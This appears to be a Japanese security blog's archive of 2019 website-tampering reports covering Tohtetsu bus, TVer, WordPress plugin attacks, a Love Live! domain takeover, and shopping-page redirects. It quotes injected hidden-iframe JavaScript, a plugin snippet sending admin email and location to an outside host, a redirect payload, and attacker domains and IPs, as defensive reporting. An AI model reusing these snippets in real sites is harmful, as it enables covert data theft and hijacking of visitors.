「Web改ざん」カテゴリーアーカイブ

東濃鉄道 バス運行情報の虚偽投稿についてまとめてみた

東濃鉄道の運行情報ページが改ざんされ、虚偽の情報が掲示されていました。ここでは関連する情報をまとめます。

虚偽情報が掲示された運行情報

f:id:piyokango:20190510054003p:plain

  • 投稿されていたのは東農鉄道の路線・高速バス運行情報ページ。
  • ストライキによる運航停止として虚偽の情報が掲載されていた。
  • 2019年5月6日10時頃に利用者から問い合わせを受け1時間後投稿が削除。*1
  • 掲示用に用いられていたプログラムはKentWebのSunbbsとみられる。

f:id:piyokango:20190510055142p:plain

虚偽投稿内にJavaScript

  • 虚偽情報投稿にJavaScriptが仕込まれていたことを指摘する投稿がある。
  • ページを見た人が意図せず管理用ページにアクセスしてしまった可能性がある。
  • 他に別サイトへ連続アクセスする実装が行われていたとの情報がある。(piyokango未確認)
  • 以下仕込まれていたとみられるJavaScript(一部伏字)
var ckb = document;
createElement('iframe');
ckb.src = 'https' + '://www.tohtetsu.co.jp/cgi-bin/sunbbs.cgi?mode=form&pass=********';
ckb.style.position = 'absolute';
ckb.style.border = '0';
ckb.style.height = '1px';
ckb.style.width = '1px';
ckb.style.left = '1px';
ckb.style.top = '1px';
if (!document.getElementById('ckb')) {
  document.write('<div id=\'ckb\'></div>');
  document.getElementById('ckb').appendChild(ckb);
}

更新履歴

  • 2019年5月10日 AM 新規作成

TVerの改ざんについてまとめてみた

2019年4月29日、動画配信サービスのTVerはWebサイト、アプリから参照される画像などが改ざんされたと発表しました。ここでは関連する情報をまとめます。

公式リリース


tver.jp

被害の状況

f:id:piyokango:20190430010119p:plain
不正アクセスされたとみられるコンテンツ管理システム(アーカイブより、現在アクセス不可)

  • TVerのコンテンツ管理システムが外部から不正アクセスを受けた。
  • 何者かにより新規投稿や複数の番組画像の一部や番組説明、タイトルが改ざんされた。

f:id:piyokango:20190430011032p:plain

  • コンテンツが改ざんされた期間は2019年4月29日0時~3時半頃。
  • アップロードされていた画像には違法なものも含まれていたとみられる。
  • マルウェア感染などコンテンツ閲覧者への直接的な影響はない。
  • TVer上で行われていたアンケート情報の漏洩は確認されていない。

原因

f:id:piyokango:20190430095102p:plain

  • コンテンツ管理システムのアカウント情報(ID、パスワード)が外部から参照可能であったため。*1
  • データが参照可能となっていた経緯(サーバーの設定変更の詳細)は不明。

f:id:piyokango:20190430005511j:plain

  • パスワードは平文で保存されていた可能性がある。
  • 画像設置の行為は改ざんされる1日前から行われていた模様。

f:id:piyokango:20190430010015p:plain
f:id:piyokango:20190430095120j:plain

更新履歴

  • 2019年4月30日 AM 新規作成
  • 2019年4月30日 AM 画像を修正(補足書きなど追記)

WordPressプラグインを狙う攻撃が活発化している件をまとめてみた

「Yuzo Related Posts」など人気のWordPressプラグインを狙った攻撃活動が観測されているとしてセキュリティベンダが注意を呼び掛けており、また国内でも関連が疑われる被害報告が上がっています。ここでは関連する情報をまとめます。

3月以降脆弱性が確認されたプラグイン

2019年3月以降、脆弱性の悪用が報告されたプラグインは次のもの。

No 報告日 対象のプラグイン インストール数 バージョン 脆弱性
1 2019/03/15 Easy WP SMTP 40万件超 1.3.9以前 管理者への特権昇格
2 2019/03/21 Social Warfare 6万件超 3.5.2以前 XSS(格納型)、任意コードの実行
3 2019/03/30 Yuzo Related Posts 6万件超 5.12.91以前 XSS(格納型)
4 2019/04/09 Visual CSS Style Editor 3万件超 7.1.9以前 管理者への特権昇格
  • 全て脆弱性検証コード公開と攻撃活動観測あり。
  • 報告に上がっているのは詐欺サイトへの誘導。以下はセキュリティ企業が報告しているもの。
setforspecialdomain[.]com
somelandingpage[.]com
getmyfreetraffic[.]com
hellofromhony[.]org
pastebin.com/raw/0yJzqbYf
pastebin.com/raw/PcfntxEs
185.212.131.45
185.212.128.22
185.212.131.46
86.109.170.200
176.123.9.52
  • Defiantは脆弱性を悪用する活動は同一のグループによるものと推定。
  • Yuzo Related PostsとYellow PencilはWordpress.orgで4/16時点で非公開状態。
  • Wordpress.orgで非公開化されたものはセキュリティ上の問題が生じている可能性あり。

f:id:piyokango:20190417164643p:plain
公開停止中のYuzo Related Posts

国内での被害報告



  • Sucuriによれば、プラグインが利用されているかスキャン活動も観測されている模様。
  • プラグインに内包されるJavaScriptファイルなどを探査する。
  • 以下はYuzo Related Postsを対象としたもの。
https://[WordPress Site]/wp-content/plugins/yuzo-related-post/assets/js/admin.js

f:id:piyokango:20190417131609p:plain
JPドメインでも確認した例

以下はプラグイン別に概要をまとめたもの。

(1)Easy WP SMTP

脆弱性の概要
  • インポート、エクスポートの機能のアクセス制御に不備。
  • 細工したファイルをアップロードし、認証無しにWordPressの設定を変更できる。
  • 観測された攻撃は既定のロールを管理者にし、ユーザー登録機能を有効にするもの。

(2)Social Warface

脆弱性の概要
  • プラグイン呼び出しの際、読込先のファイル(JSON)のURLを指定できる。
  • 一部のパラメーターにエスケープ漏れがあり、XSSの脆弱性が存在する。
  • 観測された攻撃例ではPastebinが利用されていた。

(3)Yuzo Related Posts

脆弱性の概要
  • プラグインから呼び出される特定のパラメーターにエスケープ漏れが存在する。
  • 送信されたデータはデータベースから消さない限り、永続的に残るもの。
  • 脆弱性はyuzo-related-postが含まれるURL。
  • このプラグインは日本語記事でも紹介されている。
対策・復旧方法

wordpress.org
開発者が推奨する対策は以下の通り。

  • 一刻も早いプラグインの削除、アンインストール
  • wp_optionsテーブルにあるyuzo_related_post_optionsのレコード削除
  • wp_yuzoviewsはこの問題に影響しないため、削除しないように注意。
  • 改良バージョンは近々公開されると開発者は予告。
  • 開発者は他のプラグインへの影響はないと説明している。

f:id:piyokango:20190417131549p:plain

(4)Visual CSS Style Editor (Yellow Pencil)

脆弱性 検証コード
  • 特定のパラメーターが指定されると管理者特権でWordPressを操作できる。
  • これを利用してプラグイン呼び出しの際にWordPressの任意のオプションを指定が可能。
  • 任意のユーザー登録を可能とするオプションを有効化することができる。

(参考)一部プラグインは有効化時情報送信

脆弱性と別話題だがプラグイン有効化の際に情報を送信している行為が確認されたとの指摘がある。
technote.space

  • プラグインが改ざんされたのではなく、この元々備わっていたもの。
  • Yuzo Related Postsでは以下箇所で管理者メールアドレス、サーバーIPに関連する情報(緯度経度等)を送信していた。
$r = get_userdata(1);$n = $r->data->display_name;$e = get_option( 'admin_email' );echo "<script>jQuery.ajax({url: 'http://ilentheme.com/realactivate.php?em=$e&na=$n&la=".$IF_MyGEO->latitude."&lo=".$IF_MyGEO->longitude."&pais_code=".$IF_MyGEO->countryCode."&pais=".$IF_MyGEO->countryName."&region=".$IF_MyGEO->region."&ciudad=".$IF_MyGEO->city."&ip=".$IF_MyGEO->ip."&code=$code&type=$type',success: function (html) { null; } });</script>";

http://ilentheme.com/realactivate.php

  • また他関連表示プラグイン「WordPress Related Posts」でも情報送信を行っていると指摘している。

technote.space

(参考)脆弱性対応をめぐり衝突が起きていた

f:id:piyokango:20190417164236p:plain

更新履歴

  • 2019年4月17日 AM 新規作成

ラブライブ!公式サイトの改ざんについてまとめてみた

2019年4月5日早朝、ラブライブ!の公式サイトで改ざん被害が発生したと運営元アカウントが明らかにしました。ここでは関連する情報をまとめます。

公式のアナウンス

  • 安全性が確認されるまでは暫定的に設置したサイトを閲覧するよう案内。

www.sunrise-inc.co.jp

f:id:piyokango:20190406061542p:plain
発生直後に掲載されていた案内(現在は削除済)

サンライズ社サイト

www.sunrise-inc.co.jp

公式Twitter






公式サイトの状況

  • 2019年4月5日 2時頃から「ラブライブは我々が頂いた!」として次の画面が表示されていた。

f:id:piyokango:20190405060652p:plain

  • その後もページの一部箇所が変更。(直接確認できていないが他パターンもある模様)

f:id:piyokango:20190405091048p:plain
f:id:piyokango:20190405114213p:plain

  • 検索サイトからも次のように表示されていた。*1

f:id:piyokango:20190405060641p:plain

問題が生じた手口は調査中

f:id:piyokango:20190406060656p:plain

  • ラブライブ!のドメインが第三者にのっとられたために問題が発生した可能性がある。
  • ドメインのっとりについてサンライズは事実確認含め原因調査中。
  • 接続先が変更された第三者のページでは移管申請を行い保有者が承認しただけと説明。
  • サンライズはドメインロックなど安全対策は実施済みであったと取材に回答。*2

piyolog.hatenadiary.jp

表示されるページの状況

4/5 6時時点に確認

  • 音楽再生を行うタグが書かれていたがマルウェア感染など実脅威となる仕掛けは確認できず。

f:id:piyokango:20190405064003p:plain

  • GENERATORには「Namo WebEditor」の記述。

f:id:piyokango:20190405063946p:plain

  • METAタグを用いて60秒後に別サイト(艦隊これくしょん)のサイトへ遷移。

f:id:piyokango:20190405064055p:plain

  • FONTタグの一部文字が化けていた。

f:id:piyokango:20190405063938p:plain

4/5 12時時点に確認

  • IPアドレスが「157[.]112[.]187[.]13」から「157[.]112[.]186[.]245」へ変更。

4/5 15時半時点に確認

  • ドメイン情報が更新されサンライズ社に変更
  • 更新後に接続時にラブライブ!公式サイトのページが表示。

4/5 22時時点に確認

  • 安全性の確認の点検としてページが更新された。

f:id:piyokango:20190406062203p:plain

4/11 安全宣言後、元のドメインで再開

ドメイン情報の変化

f:id:piyokango:20190405060320p:plain

  • 履歴を確認するとIIJからXSEVERにIPアドレスが変更されていた。

f:id:piyokango:20190405060519p:plain
(更新日 2018年8月1日)
f:id:piyokango:20190405060548p:plain
(更新日 2019年4月5日)

  • 最終更新日は「2019/04/05 01:18:00 (JST)」となっている。
  • 同様にホストされているサンライズ社サイトは正常に表示される。
関与主張するSNSアカウントが存在
  • ドメイン情報に登録されたものと同じ名前のアカウントが存在。
  • 複数人から寄せられた質問へ答える形で行為の目的などを投稿。
  • 自身が管理しているとしてドメイン一覧の画像を投稿。

f:id:piyokango:20190406062630p:plain

  • 他複数のドメインでも同様のトラブルがあったとの報告があるが事実関係は確認されていない。*3
のっとり後に証明書が発行される
  • のっとられた後にlovelive-anime[.]jpドメインでTLS証明書の発行が行われた模様。



更新履歴

  • 2019年4月5日 AM 新規作成
  • 2019年4月5日 AM 続報反映
  • 2019年4月5日 AM 正規サイト表示となっていた箇所を削除
  • 2019年4月5日 PM 続報反映、改ざんと記載していた一部箇所を「のっとり」等に変更。
  • 2019年4月6日 AM 続報反映
  • 2019年4月13日 AM 続報反映

通販ページなどへ遷移するWebサイト改ざんについてまとめてみた

タイヤホイールや自転車などの通販ページに遷移させるWebサイトの改ざん事例が確認されています。ここでは関連する情報をまとめます。

確認した事象

piyokangoが確認した関連するとみられる被害は次のものです。
ただしこれらが同じ時期、同じ原因で行われたのかは確証を得ていません。

  • Webサイトが改ざんされ、通販ページなどへ遷移する。
  • 通販は自転車やタイヤホイール、カーテンなどを扱うもの。*1
  • 一部は偽警告ページが表示される場合がある。

公式発表では次の2件確認しています。

1.日本ノルディックフィットネス協会


www.facebook.com

検索すると次のキャッシュが残っていた。タイヤの通販(に見える)ページが表示されていた模様。
f:id:piyokango:20190303053203p:plain

f:id:piyokango:20190303053511p:plain

タイヤの名前で検索すると似たようなページが引っ掛かった。(1つ目は2月19日、2つ目は1月27日のキャッシュ)
f:id:piyokango:20190303053624p:plain

またJNFAの改ざん被害を受けたページ内にある「認知症予防のために~軽度認知障害(MCI)を早期発見する血液検査~」は次のページに含まれる文字列と一致したが、改ざんとの関連は不明。
mcbi.co.jp

キャッシュが残っていないため時期は不明だが、関係なさそうに見えるWebサイトも検索にかかった。(2件とも削除されている)
f:id:piyokango:20190303054147p:plain

f:id:piyokango:20190303054150p:plain

2.さっぽろ天神山アートスタジオ(札幌市)

www.city.sapporo.jp

「自転車買取.jp」と表示されたページへ遷移する2月28日のキャッシュが残っていた。
f:id:piyokango:20190303055153p:plain

同様に"自転車買取.jp"と埋め込まれたページが改ざんされたまま残っていた。
f:id:piyokango:20190303060558p:plain

アクセスしたところ次のJavaScriptのみが返された。

<script type='text/javascript'>setTimeout("window.location='http://<遷移するURL>/jump.aspx?jumpid=y3rate&f=<遷移先のページ>'",0000000000);</script>

確認した挙動は以下。

  • しばらく動かしているとYahoo!Japanのページに飛ばされるように挙動が変化した。(条件不明。。)
  • 検索サイトから飛んだ場合に別サイトへ飛ばされ、直接開くとそのサイトのページが表示される。

フィッシングサイトの設置も

  • 以下のURLにAmerican Expressのフィッシングサイトが設置されたとみられる痕跡が残っていた。(現在は既に削除されている)
https://tenjinyamastudio.jp/wordpress/wp-content/themes/amex/home2/home/


https://urlscan.io/screenshots/21dcf838-23d3-48e4-84f2-02219d45188b.png
urlscan.ioに残っていたスキャンログより)

更新履歴

  • 2019年3月3日 AM 新規作成
  • 2019年3月4日 AM さっぽろ天神山スタジオのフィッシングサイトについて追記